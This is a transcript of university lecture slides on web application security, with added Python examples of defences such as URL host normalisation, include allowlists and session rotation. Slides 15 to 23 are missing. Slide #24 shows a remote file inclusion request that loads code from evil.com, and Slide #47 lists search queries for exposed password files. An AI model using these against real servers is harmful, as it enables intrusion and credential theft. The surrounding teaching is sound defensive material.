CSC 482/582: Computer Security

Date post: 25-Feb-2016
Transcript

Introduction

Slide #1: CSC 482/582: Computer Security: Web Security

Slide #2: Topics
- Why web application security?
- HTTP and web input types
- Web Application Vulnerabilities
- Client-side Attacks
- Finding Web Vulnerabilities

Slide #3: Why Web Application Security?

Slide #4

Slide #5: Web Transactions
(Diagram: Web Browser and OS on the client side, Web Server on the other side of the Network; an HTTP Request goes to the server and an HTTP Response comes back.)

Slide #6: HTTP: HyperText Transfer Protocol
- Simple request/response protocol
- Request methods: GET, POST, HEAD, etc.
- Protocol versions: 1.0, 1.1
- Stateless: each request is independent of previous requests, i.e. request #2 doesn't know you authenticated in #1.
- Applications are responsible for handling state.

Slide #7: HTTP Request

GET http://www.google.com/ HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/20060909 Firefox/1.5.0.7
Accept: text/html, image/png, */*
Accept-Language: en-us,en;q=0.5
Cookie: rememberme=true; PREF=ID=21039ab4bbc49153:FF=4

(Labels: Method, URL and Protocol Version on the request line; Headers; Blank Line; no data for the GET method.)

Slide #8: HTTP Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Fri, 13 Oct 2006 03:16:30 GMT

... (page data) ...

(Labels: Protocol Version and HTTP Response Code on the status line; Headers; Blank Line; Web Page Data.)

Slide #9: Different Perspectives
Client Side
- HTTP requests may reveal private info.
- HTTP responses may reveal private info.
- HTTP responses may include malicious code (Java, ActiveX, Javascript).
Server Side
- HTTP requests may contain malicious input.
- HTTP requests may have forged authentication.
- HTTP responses may be intercepted.

Slide #10: Web-based Input
- Client and Server Perspectives
- Types of Input: URL parameters, HTML, Cookies, Javascript
- Cross-Site Scripting

Slide #11: URL Format
scheme://userinfo@host:port/path?query
- Whitespace marks the end of a URL.
- @ separates userinfo from host.
- ? marks the beginning of the query string.
- & separates query parameters.
- %HH represents the character with hex value HH, e.g. %20 represents a space.
- Example: http://username:password@[host]:8001/a%20spaced%20path
- See RFC 1738 for URL definitions.

Slide #12: URL Parameters
- The client controls the query string: you cannot limit values to those specified in a form.
- Any character can be URL-encoded, even if it doesn't need to be.
- Any valid format may be used to disguise the true destination of a URL.

Slide #13: URL Obfuscation
- IP address representations: dotted quad (decimal, octal, hexadecimal); hexadecimal without dots (with left padding); dword (32-bit int).
- Examples: www.eecs.utoledo.edu = 131.183.19.14 (dotted quad) = 0xDEDA83B7130E (hexadecimal + padding) = 2209813262 (dword).
- Notes: browser support for these IP address formats is limited, though IE did support them at one time.

Slide #14: HTML Special Characters
- > ends a tag (some browsers will auto-insert a matching one).
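The Slide #13 obfuscations are only a problem if a URL filter compares raw text. The following is an added example (not from the slides) that normalises the dword, padded-hex and octal/hex dotted-quad spellings back to dotted decimal so that an allowlist check sees the true destination; the allowlist contents are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

_NUMERIC_PART = r"(?:\d+|0x[0-9a-f]+)"
_DOTTED_RE = re.compile(_NUMERIC_PART + r"(?:\." + _NUMERIC_PART + r"){3}")


def _octet(part: str) -> int:
    """Decode one dotted-quad component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if part.startswith("0x"):
        return int(part[2:], 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def normalize_host(host: str) -> str:
    """Map the Slide #13 IP spellings (dword, left-padded hex, octal/hex dotted quad)
    to canonical dotted decimal; a DNS name is returned lower-cased and unchanged."""
    h = host.strip().lower()
    if re.fullmatch(r"0x[0-9a-f]+", h):
        # Hex without dots: the left padding is ignored, only the low 32 bits count.
        value = int(h[2:], 16) & 0xFFFFFFFF
    elif re.fullmatch(r"\d+", h):
        value = int(h, 10)  # dword form
        if value > 0xFFFFFFFF:
            raise ValueError(f"dword out of range: {host}")
    elif _DOTTED_RE.fullmatch(h):
        parts = [_octet(p) for p in h.split(".")]
        if any(p > 255 for p in parts):
            raise ValueError(f"octet out of range: {host}")
        value = (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]
    else:
        return h
    return str(ipaddress.IPv4Address(value))


def url_destination(url: str) -> str:
    """True destination host of a URL: userinfo and port stripped, IP obfuscation undone."""
    host = urlsplit(url).hostname
    if host is None:
        raise ValueError(f"no host in URL: {url}")
    return normalize_host(host)


def is_allowed_destination(url: str, allowlist: set) -> bool:
    """Allowlist check done on the normalised host, never on the raw URL text."""
    return url_destination(url) in allowlist
```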

Slide #24: Remote File Inclusion example

GET /include.php?server_root=http://evil.com/command.txt

Example from "The #1 Flaw in PHP Applications", http://opensource.apress.com/article/7/the-1-security-flaw-in-php-applications, 2006.

Slide #25: Mitigating Remote File Inclusion
- Turn off remote file inclusion.
- Do not run code from uploaded files.
- Do not use user-supplied paths.
- Validate all paths before loading code.
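An added example (not from the slides or the cited article) contrasting the Slide #24 include pattern with the Slide #25 rules: the include target is taken from an allowlist of names, anything carrying a URL scheme is refused, and the resolved path must stay under the include root. The include root, the allowlist and the "header.php" suffix are assumptions made for the example.

```python
import posixpath
from pathlib import PurePosixPath
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumed application layout and allowlist (constructed for this example).
INCLUDE_ROOT = PurePosixPath("/var/www/app/includes")
ALLOWED_INCLUDES = {"header", "footer", "comments"}


def vulnerable_include_target(query: str) -> str:
    """The Slide #24 pattern: the include target is built straight from the
    user-supplied server_root parameter, so a URL in it becomes a remote include."""
    server_root = parse_qs(query).get("server_root", [""])[0]
    return server_root + "/header.php"  # suffix assumed for the example


def check_include(name: str) -> Optional[str]:
    """Apply the Slide #25 rules to a requested include name.
    Returns a rejection reason, or None when the name is acceptable."""
    if urlsplit(name).scheme or name.startswith("//"):
        return "remote include rejected"        # no remote file inclusion
    if name not in ALLOWED_INCLUDES:
        return "include name not on allowlist"  # no user-supplied paths
    return None


def safe_include_path(query: str) -> PurePosixPath:
    """Resolve the 'page' parameter to a file under INCLUDE_ROOT or raise ValueError."""
    name = parse_qs(query).get("page", [""])[0]
    reason = check_include(name)
    if reason is not None:
        raise ValueError(reason)
    path = PurePosixPath(posixpath.normpath(str(INCLUDE_ROOT / f"{name}.php")))
    # Defence in depth: even an allowlisted name must resolve inside the root.
    if INCLUDE_ROOT not in path.parents:
        raise ValueError("path escapes include root")
    return path
```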

Slide #26: Authentication
(Slide footer: March 4, 2009, SIGCSE)
- Authentication is the process of determining a user's identity.
- Key Ideas: HTTP is a stateless protocol, so every request must be authenticated. Use username/password on the first request; use session IDs on subsequent queries.

Slide #27: Authentication Attacks
- Sniffing passwords
- Guessing passwords
- Identity management attacks
- Replay attacks
- Session ID fixation
- Session ID guessing

Slide #28: Identity Management Attacks
- Auth requires identity management: user registration, password changes and resets.
- Mitigations: Use CAPTCHAs to protect registration. Don't use easy-to-guess secret questions. Don't allow an attacker to reset the e-mail address that the new password is sent to.

Slide #29: Session ID Guessing
- Do session IDs show a pattern? How does changing the username change the ID? How do session IDs change with time?
- Brute forcing session IDs: use a program to try 1000s of session IDs.
- Mitigating guessing attacks: use a large key space (128+ bits); use a cryptographically random algorithm.

Slide #30: Mitigating Authentication Attacks
- Use SSL to prevent sniffing attacks.
- Require strong passwords.
- Use secure identity management.
- Use a secure session ID mechanism: IDs chosen at random from a large space; regenerate session IDs with each request; expire session IDs in a short time.
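An added example (not from the slides) of the session ID mechanism Slides #29 and #30 call for: 128-bit IDs from the OS CSPRNG, a fresh ID issued on every authenticated request with the old one invalidated, and a short expiry. The 15-minute lifetime and the injectable clock are assumptions made for the example; because only server-issued IDs are ever stored, an ID fixed by an attacker is never accepted.

```python
import secrets
import time
from typing import Callable, Dict, Optional, Tuple

SESSION_BITS = 128        # Slide #29: large key space (128+ bits)
SESSION_TTL = 15 * 60     # Slide #30: expire IDs in a short time (15 min assumed)


class SessionStore:
    """In-memory session table: session_id -> (username, expiry time)."""

    def __init__(self, ttl: float = SESSION_TTL,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self._sessions: Dict[str, Tuple[str, float]] = {}
        self._ttl = ttl
        self._clock = clock

    @staticmethod
    def _new_id() -> str:
        # secrets draws from the OS CSPRNG; 16 bytes -> 128 bits -> 32 hex chars
        return secrets.token_hex(SESSION_BITS // 8)

    def login(self, username: str) -> str:
        """First request: username/password verified elsewhere; issue a session ID."""
        sid = self._new_id()
        self._sessions[sid] = (username, self._clock() + self._ttl)
        return sid

    def authenticate(self, sid: str) -> Optional[Tuple[str, str]]:
        """Subsequent request: validate the presented ID and rotate it.
        Returns (username, new_session_id), or None if unknown or expired."""
        entry = self._sessions.pop(sid, None)   # presented ID is retired either way
        if entry is None:
            return None                         # guessed, fixated or already-rotated ID
        username, expires_at = entry
        if self._clock() > expires_at:
            return None                         # expired: user must log in again
        new_sid = self._new_id()                # regenerate with each request
        self._sessions[new_sid] = (username, self._clock() + self._ttl)
        return username, new_sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)
```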

Slide #31: Access Control
- Access control determines which users have access to which system resources.
- Levels of access control: Site, URL, Function, Function(parameters), Data.

Slide #32: Mitigating Broken Access Control
- Check every access.
- Use a whitelist model at every layer.
- Do not rely on client-level access control.
- Do not rely on security through obscurity.

Slide #33: Improper Error Handling
- Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly.
- Errors can provide too much data: stack traces, SQL statements, subsystem errors, user typos (such as passwords).

Slide #34: Example of Improper Error Handling

mySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145)

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucleus/libs/COMMENTS.php on line 124

Slide #35: Mitigating Improper Error Handling
- Catch all exceptions.
- Check all error codes.
- Wrap the application with a catch-all handler.
- Send a user-friendly message to the user.
- Store details for debugging in log files.
- Don't log passwords or other sensitive data.

Slide #36: Insecure Storage
- Storing sensitive data without encrypting it, using a weak encryption algorithm, or using a strong encryption system improperly.
- Problems: not encrypting sensitive data; using home-grown cryptography; insecure use of weak algorithms; storing keys in code or unprotected files.

Slide #37: Storage Recommendations
- Hash algorithms: MD5 and SHA1 look insecure; use SHA256.
- Encrypting data: use AES with 128-bit keys.
- Key generation: generate random keys; use a secure random source.

Slide #38: Mitigating Insecure Storage
- Use well-studied public algorithms.
- Use truly random keys.
- Store keys in protected files.
- Review code to ensure that all sensitive data is being encrypted.
- Check the database to ensure that all sensitive data is being encrypted.

Slide #39: Insecure Communication
- Applications fail to encrypt sensitive data in transit from client to server and vice versa.
- Need to protect: user authentication and session data; sensitive data (CC numbers, SSNs).
- Key Idea: use SSL for all authentication connections.

Slide #40: Mitigating Insecure Communication
- Use SSL for all authenticated sessions.
- Use SSL for all sensitive data.
- Verify that SSL is used with automated vulnerability scanning tools.

Slide #41: Client-side Attacks
- Buffer Overflow: 2004 iframe; 2004-05 jpeg.
- Remote Code: ActiveX, Flash, Java, Javascript.
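An added example (not from the slides) of the Slide #35 catch-all handler applied to a failure like the Slide #34 one: the user gets only a generic message and an incident reference, the exception text, stack trace and request parameters go to the log, and password-like fields are redacted before logging. The failing handler, the request fields and the redaction list are constructed for the example.

```python
import logging
import traceback
import uuid
from typing import Callable, Dict, Tuple

# Field names that must never reach the log (assumed list for the example).
SENSITIVE_FIELDS = {"password", "passwd", "pass", "secret", "token"}


def redact(params: Dict[str, str]) -> Dict[str, str]:
    """Mask sensitive request fields (Slide #35: don't log passwords)."""
    return {k: "[REDACTED]" if k.lower() in SENSITIVE_FIELDS else v
            for k, v in params.items()}


def catch_all(handler: Callable[[Dict[str, str]], str],
              log: Callable[[str], None] = logging.getLogger("app").error):
    """Wrap a request handler: any exception becomes a generic 500 response that
    carries only an incident id, while the details are stored in the log."""
    def wrapped(request: Dict[str, str]) -> Tuple[int, str]:
        try:
            return 200, handler(request)
        except Exception as exc:  # catch-all, so no stack trace or SQL reaches the user
            incident = uuid.uuid4().hex[:12]
            log(f"incident {incident}: {type(exc).__name__}: {exc}\n"
                f"params={redact(request)}\n{traceback.format_exc()}")
            return 500, f"An internal error occurred. Reference: {incident}"
    return wrapped


def comments_handler(request: Dict[str, str]) -> str:
    """Constructed failure modelled on the Slide #34 error: the database layer
    raises with the SQL statement and file name in the message."""
    item = request.get("item", "")
    raise RuntimeError(
        "mySQL error with query SELECT COUNT(*) FROM nucleus_comment as c "
        f"WHERE c.citem={item}: Can't open file: 'nucleus_comment.MYI' (errno: 145)")
```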

Notes for Slide #41: Firefox vulnerability summary: http://www.mozilla.org/projects/security/known-vulnerabilities.html; IE vulnerability list: http://secunia.com/product/11/?task=advisories

Slide #42: ActiveX
- Executable code downloaded from the server.
- Activated by the HTML object tag.
- Native code binary format.
- Security model: digital signature authentication; zone-based access control; no control once execution starts.

Slide #43: Java
- Digital signature authentication.
- Sandbox.
- Sandbox components: byte-code verifier, class loader, security manager.
- Sandbox limits: cannot read/write files; cannot start programs; network access limited to the originating host.

Slide #44: MPack Browser Malware
1. User visits site.
2. Response contains an iframe.
3. Iframe code causes the browser to make a request.
4. Request is redirected to the MPack server.
5. Server identifies OS and browser, sends the exploit that will work for the client configuration.
6. Exploit causes the browser to send a request for code.
7. MPack downloader is sent to the user and begins downloading other malware.

Notes for Slide #44: Images from http://www.symantec.com/enterprise/security_response/weblog/2007/05/mpack_packed_full_of_badness.html

Slide #45: MPack
- Commercial underground PHP software: sold for $700-1000; comes with one year of technical support; updated exploits can be purchased for $50-150.
- Infection techniques: hacking into websites and adding iframes; sending HTML mail with iframes; typo-squatting domains; using GoogleAds to draw traffic.

Slide #46: Client Protection
- Disable ActiveX and Java.
- Use NoScript to limit Javascript.
- Run the browser with least privilege.
- Use a browser sandbox: VMWare Virtual Browser Appliance; Protected Mode IE (Windows Vista).
- Go to sites directly instead of using links.
- Use plain text e-mail instead of HTML.
- Patch your browser regularly.
- Use a personal firewall.

Slide #47: Web Reconnaissance
- Google Hacking: "Index of +passwd", "Index of +password.txt", "filetype:htaccess user", "allinurl:_vti_bin shtml.exe"
- Web Crawling: wget --mirror http://www.w3.org/ -o /mirror/w3
- The Santy Worm used Google to find vulnerable servers.
Notes for Slide #47: http://news.com.com/Photo+Google+hack+helps+spread+Web+worm/2009-7349_3-5499736.html?tag=cd.top

Slide #48: Proxies and Vulnerability Scanners
- Achilles
- OWASP WebScarab
- Paros Proxy
- SPI Dynamics WebInspect
(Diagram: Web Browser <-> Web Proxy <-> Web Server; the proxy lets you edit web data: URL, Cookies, Form Data.)

Slide #49: Achilles Proxy Screenshot

Slide #50: Key Points
- All input can be dangerous: URLs, cookies, executable content.
- Consider both client and server security.
- SSL is not a panacea: it gives confidentiality and integrity of data in transit, but input-based attacks can be delivered via SSL.
- Top vulnerabilities: Cross-Site Scripting, SQL Injection, Remote File Inclusion.

Slide #51: References
- Andreu, Professional Penetration Testing for Web Applications, Wrox, 2006.
- Daswani et al., Foundations of Security, Apress, 2007.
- Friedl, SQL Injection Attacks by Example, http://unixwiz.net/techtips/sql-injection.html, 2007.
- IBM, IBM X-Force 2010 Mid-Year Trend and Risk Report, http://www-935.ibm.com/services/us/iss/xforce/trendreports/, 2010.
- OWASP, OWASP Top 10 for 2010, http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
- Niels Provos et al., The Ghost in the Browser: Analysis of Web-based Malware, HotBots '07, http://www.usenix.org/events/hotbots07/tech/full_papers/provos/provos.pdf, 2007.
- Samy, MySpace Worm Explanation, http://namb.la/popular/tech.html, 2005.
- Joel Scambray, Mike Shema, Caleb Sima, Hacking Exposed Web Applications, Second Edition, McGraw-Hill, 2006.
- Stuttard and Pinto, The Web Application Hacker's Handbook, Wiley, 2007.